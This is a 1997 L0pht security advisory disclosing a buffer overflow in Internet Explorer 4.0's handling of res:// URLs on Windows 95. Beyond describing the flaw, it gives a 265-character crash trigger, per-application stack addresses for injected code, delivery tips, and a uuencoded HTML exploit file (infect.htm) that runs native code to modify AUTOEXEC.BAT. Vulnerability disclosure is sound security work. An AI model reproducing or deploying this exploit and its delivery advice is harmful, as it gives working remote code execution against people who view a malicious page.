L0pht Advisory: IE4.0

[dildog () L0PHT COM (DilDog)]

      Document:  L0pht Security Advisory
    URL Origin:  http://l0pht.com/advisories.html
  Release Date:  November 1st, 1997
   Application:  Microsoft Internet Explorer 4.0 Suite
      Severity:  Viewing remote HTML content can execute arbitrary native code
        Author:  dildog () l0pht com
 Operating Sys:  Windows 95

-------------------------------------------------------------------------------

 ========
 Scenario
 ========

  The Microsoft Internet Explorer 4.0 Suite, including all programs supplied
  with it that read and/or process HTML from either local machines, intranet
  machines, or remote internet machines are subject to a buffer overflow in the
  HTML decoding process. The buffer overflow can cause the application to page
  fault, or in the worst case, execute arbitrary precompiled native code.

 =======
 Example
 =======

  1. Copy the supplied HTML file(s) into a location that is accessible via the
     target application.
  2. Point to it. Look at it.
  3. Click on the link. (or let someone click it for you)
  4. Become aware of what happens to your machine.
  5. Freak out and beg Microsoft to make the bad man stop.

 =================
 Technical Details
 =================

  The problem here lies in the deciphering of the URL line format itself. The
  base HTML library that is used by the Internet Explorer 4.0 Suite and the
  following programs are vulnerable:

        - Outlook Express (both mail and news)
        - Windows Explorer
        - Internet Explorer (different than regular explorer, really)

  This problem, because it stems from a programming flaw in the HTML decoding
  system, is unaffected by the Explorer "Security Zones" feature. In other
  words, if you turn on the highest security level for the zone from where the
  exploit HTML is being viewed, you are still vulnerable.

  The critical problem here is a buffer overflow in the parsing of a particular
  new type of URL protocol. The "res://" type of URL is meant to allow access
  to a local resource embedded in a local DLL file. This is useful for
  archiving entire websites into a DLL and is not, in its truest concept, a
  security flaw.

  For example, to read something out of the IE4.0 Tour (stored in a DLL) try
  the following URL: res://ie4tour.dll/page1-6.htm

  The buffer overflow is on the actual filename specified. To crash your
  machine go ahead and try res://blahblahblah ... blahblah/ in your Internet
  Explorer window where the amount of 'blah' equals 265 characters.

  The function that goes through the filename and validates it is flawed on
  Windows 95. Without checking the length, the filename is uppercased,
  concatenated with '.DLL' if it isn't there already, and in the process,
  copied into a fixed size buffer.

 ========
 Solution
 ========

  Currently, there is no solution available for this flaw. You can't set any
  Internet Explorer options to avoid it, and you are not protected by any
  level of zone security. Simply don't surf the web, read email or view
  net news using Internet Explorer 4.0 until Microsoft puts up a hotfix.

 ============
 Exploit Code
 ============


    Here we go...
    When constructing the exploit we want to try something useful.
    Lets's start with appending text of your choice to AUTOEXEC.BAT...
    (note that running native code lets you do pretty much anything you want)

    Note that the location of the exploit string in the stack is very important
    and it varies from target application to target application.

    Constructing the exploit string:
    Figure out stack location for exploit code...

        App                     Loc
        Internet Explorer       0x0057C144
        Windows Explorer        0x0088A0F4
        ...

    Yeah, I know that those locations have null bytes in them and you can't
    put those (or lowercase letters, or CR/LF or 0x07 or anything like that)
    in the exploit string... but we'll let microsoft fix that for us. Step thru
    the process to see IE add that extra null character for you. Will they
    ever cease to amaze...

    Put together what you wanna do, tack on the necessary jump addresses and
    all that. That's it.


And now, UUENCODED to preserve freshness:

*************************************************************************
* MAKE SURE YOU RUN THIS EXPLOIT WITH __INTERNET__ EXPLORER, _NOT_      *
* REGULAR OL' WINDOWS EXPLORER. (put it on a website and download it or *
* click on the IE desktop icon (run iexplore.exe) and type in the name  *
* of the file into the URL line)  IT WON'T WORK OTHERWISE!!!!           *
*                                (though it could be made to do so)     *
*************************************************************************

----====/ SNIP

section 1 of uuencode 5.20 of file infect.htm    by R.E.M.

begin 644 infect.htm
M/&AT;6P^#0H\:&5A9#X-"CQT:71L93X-"DEN=&5R;F5T($5X<&QO:71E<@T*
M/"]T:71L93X-"CPO:&5A9#X-"CQB;V1Y(&)G8V]L;W(](T9&1D9&1B!T97AT
M/2,P,#`P,#`^#0H-"CQC96YT97(^#0H\:#$^5VAA="!D;R!)('=A;G0@=&\@
M:6YF96-T('1O9&%Y/SPO:#$^#0H-"D-L:6-K(&AE<F4@=&\@;6]D:69Y(&%U
M=&]E>&5C+F)A=#QP/@T*#0H\82!H<F5F/2(-"G)E<SHO+[C$0=B`+8"`@("0
MD)"0D)"+V#/)@,&J`]FQ7XH3@.)_B!-#XO:0D)"0D%"0D&H"D)"0NNW"6`&!
MZ@$!`0&04KNW\O>_@.^`_]-:6E"0D#/;LP)3@^L$4U"[X(#YO__3@^P,D%A0
M,]NS.5.[#-+G$('K$!"0$%-0N[#*^;__TX/$#)"0D)"[SX#YO__3D)"0N["O
M^+__TY"0D,S,+2TM+2TM+2TM+2TM+4,Z7$%55$]%6$5#+D)!5("-BD5#2$\@
M34E#4D\D3T94(#!73EH@64]5+BXN(%)%4$5.5"!!3D0@0D4@4T%6140AC8I0
M055318V*@"TM+2TM+2TM+2TM+2TM+2U!04%!0D)"0D,!(+Z_1$1$143!5R\-
M"B(^#0H\9F]N="!F86-E/2)7:6YG9&EN9W,B('-I>F4]*S8^_SPO9F]N=#X\
M9F]N="!S:7IE/2LV/CT\+V9O;G0^/&9O;G0@9F%C93TB5VEN9V1I;F=S(B!S
M:7IE/2LV/B9G=#PO9F]N=#X-"CPO83X-"@T*/"]C96YT97(^#0H-"CPO8F]D
->3X-"CPO:'1M;#X-"CX-
`
end
sum -r/size 62455/917 section (from "begin" to "end")
sum -r/size 5779/643 entire input file

/====---- SNIP


A haiku:

 Microsoft IE
 Is there no security?
 Not if you ask me.

dildog () l0pht com (11/1/97)

-------------------------------------------------------------------------------

For more L0pht (that's L - zero - P - H - T) advisories check out:
http://l0pht.com/advisories.html